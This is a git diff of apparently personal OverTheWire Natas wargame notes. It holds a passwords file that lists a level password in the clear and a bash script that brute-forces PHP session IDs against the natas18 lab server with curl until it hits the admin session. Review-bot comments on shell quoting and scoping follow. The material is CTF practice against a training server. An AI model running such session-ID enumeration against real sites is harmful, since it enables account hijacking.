diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md index c3cd1ec..b958a6e 100644 --- a/overthewire/natas/passwords.md +++ b/overthewire/natas/passwords.md @@ -72,7 +72,6 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ Another oracle attack using an SQL injection AND this time using a timing based attack. NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]] - natas19: natas20: diff --git a/overthewire/natas/scripts/natas18.sh b/overthewire/natas/scripts/natas18.sh index 0a6f2aa..7b9c2d6 100755 --- a/overthewire/natas/scripts/natas18.sh +++ b/overthewire/natas/scripts/natas18.sh @@ -6,7 +6,7 @@ USERNAME="admin" PASSWORD="arbitrary" req() { - local SESSION_ID=$1 + SESSION_ID=$1 curl http://natas18.natas.labs.overthewire.org/index.php \ -X POST \ -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \ @@ -14,13 +14,19 @@ req() { -d "password=$PASSWORD" \ --cookie "PHPSESSID=$SESSION_ID" \ -sS \ - | grep "regular user" &>/dev/null + | grep "Password: " } MIN_ID=0 MAX_ID=640 for ((i=MIN_ID ; i <= MAX_ID ; i++)); do - printf "Attempt: %2d" $i - req "$i" && echo -en '\r' || $(echo " [admin]"; break) - + printf "Attempt: %2d" $i + OUT=$(req "$i") + if [ $? -ne 0 ]; then + echo -en '\r' + else + echo " [admin]" + echo $OUT | awk '{print substr($2,1,32)}' + break + fi done
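Review bot: Dropping `local` in req() (natas18.sh, first hunk) turns SESSION_ID into a global that every call overwrites, and nothing in the visible hunks reads it outside the function. The later hunk calls req inside `$(...)`, so the assignment would not reach the caller's shell anyway; the change buys nothing and removes the scoping. I would keep `local SESSION_ID=$1`. The body of req() continues past this hunk and ends in the next one.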
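Review bot: In the new else branch of the loop (natas18.sh, second hunk), `echo $OUT | awk ...` expands the server's response unquoted, so the shell word-splits it and glob-expands any `*`, `?` or `[` it contains against the current directory before awk sees it. Treat the response as untrusted text and pass it through verbatim: `printf '%s\n' "$OUT" | awk '{print substr($2,1,32)}'`. The `OUT=$(req "$i")` followed by `[ $? -ne 0 ]` reads more safely as `if OUT=$(req "$i"); then ... else echo -en '\r'; fi`, which keeps the status test attached to the command it checks. The `$i` passed to printf should be quoted as well.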